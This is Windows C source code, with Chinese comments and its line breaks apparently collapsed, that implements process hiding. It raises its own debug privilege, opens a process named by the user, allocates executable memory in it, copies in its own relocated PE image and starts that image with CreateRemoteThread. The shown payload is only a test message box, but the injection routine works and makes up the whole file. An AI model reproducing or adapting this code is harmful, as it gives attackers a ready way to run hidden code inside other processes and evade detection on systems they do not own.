#include "stdio.h"#include "windows.h"#ifdef _DEBUG#define MsgBox(lpText) MessageBox(NULL,lpText,NULL,NULL)#else#define MsgBox(lpText)#endif#define LOAD_BASE_ADDR 0x03140000#define SIZE_OF_NT_SIGNATURE (sizeof(DWORD))#define OPTHDROFFSET(ptr) ((LPVOID)((BYTE *)(ptr)+((PIMAGE_DOS_HEADER)(ptr))->e_lfanew+SIZE_OF_NT_SIGNATURE+sizeof(IMAGE_FILE_HEADER)))typedef BOOL (WINAPI* p_EnumProcesses )(DWORD * lpidProcess,DWORD cb, DWORD * cbNeeded );//定义一个函数指针typedef BOOL (WINAPI* p_EnumProcessModules )( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );typedef DWORD (WINAPI* p_GetModuleBaseName) ( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );HMODULE m_module;BOOL m_bIsWinNT;//////////////////////////获取系统版本///////////////////////void GetOSVersion(void){ OSVERSIONINFO osvi; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if(GetVersionEx(&osvi)==FALSE) { MsgBox("Unable to get version info GetOSVersion()"); } if(osvi.dwPlatformId==VER_PLATFORM_WIN32s) { MsgBox("This application does not run under WIN32s!"); } if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) m_bIsWinNT = 1; else m_bIsWinNT = 0;}//////////////////////////初始化////////////////////////void Init(){ GetOSVersion(); m_module=GetModuleHandle(NULL);}////////////////////////////////通过名称获取进程ID//////////////////////////////long GetNTProcessIDbyName(char *szName){ if((!m_bIsWinNT)||(!szName)) return -1; HMODULE hModule=LoadLibrary("psapi.dll"); if(hModule==NULL) return -1; p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses"); p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules"); p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA"); DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return -1; cProcesses = cbNeeded / sizeof(DWORD); for ( i = 0; i < cProcesses; i++ ) { char szProcessName[MAX_PATH] = ""; HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i] ); if ( hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH ); if(_stricmp(szName,szProcessName)==0) { CloseHandle (hProcess); return aProcesses[i]; } } CloseHandle (hProcess); } } return -1;}///////////////////////////////提权/////////////////////////////BOOL EnableDebugPriv(){ HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) { MsgBox("OPT() failed"); return FALSE; } if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ) { MsgBox("LPV() failed"); CloseHandle( hToken ); return FALSE; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = sedebugnameValue; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) ) { MsgBox("ATP() failed"); CloseHandle( hToken ); return FALSE; } CloseHandle( hToken ); return TRUE;}///////////////////////////////////////锁定/////////////////////////////////////BOOL FixRelocationTable(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase){ DWORD lAdd=lNewBase-lMyBase; IMAGE_DOS_HEADER *ppeDosHead=(IMAGE_DOS_HEADER *)szBuf;//dos head IMAGE_NT_HEADERS32 *ppeHead=(IMAGE_NT_HEADERS32 *)(szBuf+ppeDosHead->e_lfanew);//PE head ppeHead->OptionalHeader.ImageBase=lNewBase; char* p=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress+szBuf; IMAGE_RELOCATION* relocblock=(IMAGE_RELOCATION*)(p); ppeHead->OptionalHeader.ImageBase=lNewBase; while(relocblock->VirtualAddress) { void* page = (void *)((UINT)szBuf + (UINT)relocblock->VirtualAddress); long count = (relocblock->SymbolTableIndex - 8)/2; for(int i=0; i<count; i++) { int n=*((WORD*)((char*)(&relocblock->Type)+i*sizeof(WORD))); int offset = n & 0xFFF; int type = n >> 12; //--------------------------- long test =(long)(char*)page+offset; test-=(long)szBuf; test+=lNewBase; char szMsg[200]; sprintf(szMsg,"point->0X%X sozeofblock %d=0x%X",test,count,count); switch(type) { case IMAGE_REL_BASED_ABSOLUTE: break; case IMAGE_REL_BASED_HIGH: *(UINT *)((UINT)page+offset) += HIWORD(lAdd); break; case IMAGE_REL_BASED_LOW: *(UINT *)((UINT)page+offset) += LOWORD(lAdd); break; case IMAGE_REL_BASED_HIGHLOW: *(UINT *)((UINT)page+offset) += lAdd; break; default: break; } } relocblock = (IMAGE_RELOCATION *)((BYTE *)relocblock + relocblock->SymbolTableIndex); } return TRUE;}///////////////////////////////////////隐藏进程/////////////////////////////////////BOOL HideProcessInNTbyID(unsigned long lProcessID,LPTHREAD_START_ROUTINE pMyMainProcess){ if(lProcessID==-1) return FALSE; if(GetCurrentProcessId()==lProcessID) return FALSE; HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lProcessID); if(hProc==NULL) return FALSE; HMODULE lnewModule=(HMODULE) LOAD_BASE_ADDR; DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(m_module))->SizeOfImage; char *pMem=NULL; int x=0; while((pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL) { lnewModule-=1024;//one page?? if(((unsigned long)lnewModule)<0x10000) return FALSE;//没有希望了 x=GetLastError(); } //pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(pMem==NULL) { MsgBox("VirtualAllocEx Error,多次分配后失敗"); return FALSE; } char szMsg[200]; if((long)pMem!=LOAD_BASE_ADDR) { sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 多次分配后成功!",m_module,lnewModule,pMem); MsgBox(szMsg); } else { sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 一次分配成功!",m_module,lnewModule,pMem); MsgBox(szMsg); } if((long)pMem!=(long)lnewModule) { lnewModule=(HMODULE)pMem; MsgBox("(pMem!=lnewModule)"); } DWORD dwOldProt,dwNumBytes,i; MEMORY_BASIC_INFORMATION mbi; char* pMyExeData=new char[dwSize]; long lMyID=GetCurrentProcessId(); HANDLE hMyProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lMyID); DWORD dRead; ReadProcessMemory(hMyProc,m_module, pMyExeData,dwSize,&dRead); FixRelocationTable(pMyExeData,dwSize,(unsigned long)m_module,(unsigned long)pMem); VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) { if(!(mbi.Protect & PAGE_GUARD)) { for(i=0;i<mbi.RegionSize;i+=0x1000) { VirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt); WriteProcessMemory(hProc,pMem+i,pMyExeData+i,0x1000,&dwNumBytes); } } pMem+=mbi.RegionSize; VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); } VirtualFreeEx( hProc, pMem, dwSize, MEM_DECOMMIT); DWORD dwRmtThdID; long l=(char*)lnewModule-(char*)m_module; HANDLE hRmtThd=CreateRemoteThread(hProc,NULL,0, (LPTHREAD_START_ROUTINE)((long)pMyMainProcess+(long)l), (LPVOID)lnewModule,0,&dwRmtThdID); if(hRmtThd==NULL) { MsgBox("Could create remote thread error!"); return FALSE; } CloseHandle(hProc); return TRUE;}//隐藏BOOL HideProcessInNT(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess){ unsigned long lProcessID=GetNTProcessIDbyName(szRemoteProcess); return HideProcessInNTbyID(lProcessID,pMyMainProcess);}BOOL HideProcessIn(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess){ EnableDebugPriv(); if(m_bIsWinNT) { return HideProcessInNT(szRemoteProcess,pMyMainProcess); } return TRUE;}DWORD WINAPI MyNtRemoteThreadMain(LPVOID lpParameter){ MsgBox("进程隐藏成功"); return 0; }int main(){ Init(); char* szRemoteProcess=new char[20]; printf("输入要绑定的进程名:"); scanf("%s",szRemoteProcess); if(HideProcessIn(szRemoteProcess,MyNtRemoteThreadMain)) { MsgBox("ok"); } else { MsgBox("error"); } return 0;}
